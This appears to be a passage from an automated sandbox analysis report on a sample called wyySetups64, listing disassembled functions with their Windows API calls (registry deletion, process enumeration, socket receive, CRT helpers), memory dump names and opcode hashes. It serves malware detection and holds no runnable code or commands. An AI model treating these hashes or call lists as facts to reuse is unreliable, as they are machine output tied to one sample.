                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03373311
                                                                                                                                                                                                              • Sleep.KERNEL32(00000258), ref: 0337331E
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 03373326
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03373332
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0337333A
                                                                                                                                                                                                              • Sleep.KERNEL32(0000012C), ref: 0337334B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3137405945-0
                                                                                                                                                                                                              • Opcode ID: 25aea549fb0ba207d91d5deba6309f51e2ac3a02ae15208bf0fad595be9708b3
                                                                                                                                                                                                              • Instruction ID: 99c63b87a07819885bc25c18774e886da40250785a32c330137775615ff545ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25aea549fb0ba207d91d5deba6309f51e2ac3a02ae15208bf0fad595be9708b3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F05E72204608ABD610ABA9DCC4D47B3ACAF89334F204B0AB261872D4CAB1E8018B60
                                                                                                                                                                                                              Function 00BE3A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 00BE3A63
                                                                                                                                                                                                                • Part of subcall function 00BE39BE: ___BuildCatchObjectHelper.LIBCMT ref: 00BE39F4
                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00BE3A7A
                                                                                                                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 00BE3A88
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                                                                                                                              • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                              • Instruction ID: 50ed32f5706c9872f7fb8b5352fe03adbf782ee319731a1a384c565579864482
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0014631000189BBDF12AF62CC49EAF7FEAEF08750F0040A0BC4816121D736DAB1DBA0
                                                                                                                                                                                                              Function 0339095B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 0339096E
                                                                                                                                                                                                                • Part of subcall function 033908C9: ___BuildCatchObjectHelper.LIBCMT ref: 033908FF
                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 03390985
                                                                                                                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 03390993
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                                                                                                                              • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                                                                                                              • Instruction ID: 0c77eafc3370d6683856f7a57e7743badc96318c290d064d7cfad1725f58725c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B901E475801209FBEF16AF51CC84EAABF6AEF09350F048015BD5859120D736D9B1DBA0
                                                                                                                                                                                                              Function 0337B7E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0337B800
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0337B810
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337B81B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                              • String ID: Console$IpDatespecial
                                                                                                                                                                                                              • API String ID: 849931509-1840232981
                                                                                                                                                                                                              • Opcode ID: 0691b2227fd2b4abeadf8bafe4914d84681f15955c014de51ae6fb5b4f479011
                                                                                                                                                                                                              • Instruction ID: 2523dfc4eb652e771059c8f1cc22af16a1b96c59bf16760a256ff83d02937831
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0691b2227fd2b4abeadf8bafe4914d84681f15955c014de51ae6fb5b4f479011
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0E04F72345244FFE614A764AC8BF9A7758F788712F00495FF684A12418556A444C765
                                                                                                                                                                                                              Function 0337B990 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,7AA29978), ref: 0337B9DA
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337B9FB
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337BA4B
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0337BA65
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0337BAB7
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2416807333-0
                                                                                                                                                                                                              • Opcode ID: 522fdc32b3445cc15fa7cffb9ae4fc7d41fc51902e5f0f1809fd5722305aab63
                                                                                                                                                                                                              • Instruction ID: 45148710f85663d8fcf5742deeb8b41bf657ed6f4fbd0ade0968d7f6b532b70c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 522fdc32b3445cc15fa7cffb9ae4fc7d41fc51902e5f0f1809fd5722305aab63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B41C371D00609EBEB20EF64CCC5FAAF7B8EF15714F044299E9159B280E7799A40CBA1
                                                                                                                                                                                                              Function 00BD3CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000598,00000000), ref: 00BD3CBF
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00BD399F,?,?,00000000,000000FF,00000000), ref: 00BD3CFA
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00BD3D45
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,00BD399F,?,?,00000000,000000FF,00000000), ref: 00BD3D7B
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000000D,?,?,00BD399F,?,?,00000000,000000FF,00000000), ref: 00BD3DA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$recv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 316788870-0
                                                                                                                                                                                                              • Opcode ID: ede1078a5c068e9a45cccc0eca92862cabc8ac71a859479208bfc41832770a66
                                                                                                                                                                                                              • Instruction ID: b57fcd23b4c3331e98c39aebbf76bd067be9d7c9a3178cd6e2087e952d3fa46e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ede1078a5c068e9a45cccc0eca92862cabc8ac71a859479208bfc41832770a66
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A31D3726142008BEB649F28D8C8759B7EAEB85724F1401B7ED05DB397EB31DD808B52
                                                                                                                                                                                                              Function 03373CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000598,00000000), ref: 03373CBF
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,0337399F,?,?,00000000,000000FF,00000000), ref: 03373CFA
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 03373D45
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,0337399F,?,?,00000000,000000FF,00000000), ref: 03373D7B
                                                                                                                                                                                                              • WSASetLastError.WS2_32(0000000D,?,?,0337399F,?,?,00000000,000000FF,00000000), ref: 03373DA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$recv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 316788870-0
                                                                                                                                                                                                              • Opcode ID: 57a8e8b1eeb274b3afe86c1eb353cb04ef5cf9b4b6bc5c2e159f31d10e9ebf28
                                                                                                                                                                                                              • Instruction ID: 06bdabf8786ae9a43fda5ab3c93344f2ccbbb42fa1c385f6c821a731067c280d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57a8e8b1eeb274b3afe86c1eb353cb04ef5cf9b4b6bc5c2e159f31d10e9ebf28
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6931D37A604200DFEB74DF68D8C8B6A77ADFB45330F140566ED09CB289D739D8819B91
                                                                                                                                                                                                              Function 00BDE5D7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00BDE5E5
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __FF_MSGBANNER.LIBCMT ref: 00BD6E9C
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: __NMSG_WRITE.LIBCMT ref: 00BD6EA3
                                                                                                                                                                                                                • Part of subcall function 00BD6E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6EC8
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BDE5F8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1020059152-0
                                                                                                                                                                                                              • Opcode ID: 3ed55e2b8fef365c3326a843674a1f9ae4fd7c67314d6d3c24b7aee7afb4db43
                                                                                                                                                                                                              • Instruction ID: dd53491fafd4a60f1c0489022384b0d0c9a03c96c6ceea98afdc0d119f380ac9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ed55e2b8fef365c3326a843674a1f9ae4fd7c67314d6d3c24b7aee7afb4db43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C411E732408511ABCB323F74AC09A5EBBD5EF603A0B2005E7F4689F351FF34D8408A94
                                                                                                                                                                                                              Function 03380EEB Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 03380EF9
                                                                                                                                                                                                                • Part of subcall function 0337F673: __FF_MSGBANNER.LIBCMT ref: 0337F68C
                                                                                                                                                                                                                • Part of subcall function 0337F673: __NMSG_WRITE.LIBCMT ref: 0337F693
                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              • _free.LIBCMT ref: 03380F0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1020059152-0
                                                                                                                                                                                                              • Opcode ID: 41d2c1a8ab06d6917a1259b34eedc51943b327b0711bc89430cc7b23c504c52c
                                                                                                                                                                                                              • Instruction ID: 8fe0d3e78385fbfa9a5b5c82aea27a2e281c8d28a53c752b4be24a953218a309
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41d2c1a8ab06d6917a1259b34eedc51943b327b0711bc89430cc7b23c504c52c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD112336C08B19BECB3ABF74ECC465E379DAF412A0F148626E8599F150DB34C5448B90
                                                                                                                                                                                                              Function 00BD2BD0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00BD2BFF
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BD2C15
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00BD2C24
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00BD2C2A
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD2C38
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2015114452-0
                                                                                                                                                                                                              • Opcode ID: 799aacc1ad443176db6d8a8c453d33a2030d6803707a7f1a45efddbe2c486bc0
                                                                                                                                                                                                              • Instruction ID: 3d9d3de8751a758254bbecee0a08674235ab95d71e95178cc684a8b3e6ee9351
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 799aacc1ad443176db6d8a8c453d33a2030d6803707a7f1a45efddbe2c486bc0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0018672A5024976E6209B989C81FBAB3ACEB14B10F504557FB04FB1D4EEA1E80187A5
                                                                                                                                                                                                              Function 03372C10 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03372C3F
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03372C55
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 03372C64
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 03372C6A
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03372C78
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2015114452-0
                                                                                                                                                                                                              • Opcode ID: 1710e669c91f5a2baef8377aa2fa504138ff750bc5bdaa54d4658093bcde7e6a
                                                                                                                                                                                                              • Instruction ID: f467f9f6d90a4280e77d64a42737b62c936bdffb224097b6ab6f0742ad1c0b51
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1710e669c91f5a2baef8377aa2fa504138ff750bc5bdaa54d4658093bcde7e6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9018672A5030EB6F620E7949CC1FFB736CEB18B10F504912FB00EA0C5D6AAA40187A5
                                                                                                                                                                                                              Function 00BD4B50 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 00BD4B63
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 00BD4B6D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00BD4B80
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00BD4B83
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                              • Opcode ID: f09b311bd8dcab5382a5d1908b03cffe25bd37165df5d47bd4fd2a59ca74cc74
                                                                                                                                                                                                              • Instruction ID: ec530ac8b24464e7631b9d2ea3033c6be193fe749c7050baafcf9cdbb8e572db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f09b311bd8dcab5382a5d1908b03cffe25bd37165df5d47bd4fd2a59ca74cc74
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23014F766006549FD721DB39FCC4B9BB7E8EB88328F01496AF24687611D774EC458AA0
                                                                                                                                                                                                              Function 03374B70 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03374B83
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03374B8D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03374BA0
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03374BA3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                              • Opcode ID: bb3f370ef161a945d97dab10588b238cee3d0acbeb0505817b1a23fc927d4a70
                                                                                                                                                                                                              • Instruction ID: ebb4dca030a89388760457921f04981a87c8d56fd8080af6c7433ba811a72e25
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb3f370ef161a945d97dab10588b238cee3d0acbeb0505817b1a23fc927d4a70
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C0184766006189BD720EB36FCC4B5BB7ECEB88714F054859E186C7204C739FC45CA60
                                                                                                                                                                                                              Function 00B3367A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 00B336A2
                                                                                                                                                                                                                • Part of subcall function 00B33232: __getptd.LIBCMT ref: 00B33240
                                                                                                                                                                                                                • Part of subcall function 00B33232: __getptd.LIBCMT ref: 00B3324E
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B336AC
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __getptd_noexit.LIBCMT ref: 00B298E9
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __amsg_exit.LIBCMT ref: 00B298F6
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B336BA
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B336C8
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B336D3
                                                                                                                                                                                                                • Part of subcall function 00B332D7: __CallSettingFrame@12.LIBCMT ref: 00B33323
                                                                                                                                                                                                                • Part of subcall function 00B337A0: __getptd.LIBCMT ref: 00B337AF
                                                                                                                                                                                                                • Part of subcall function 00B337A0: __getptd.LIBCMT ref: 00B337BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3282538202-0
                                                                                                                                                                                                              • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                                                                                                              • Instruction ID: fb8dd8efc4703a0361061b3721196f581e7acf3bf51752c446b219f6de530c4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
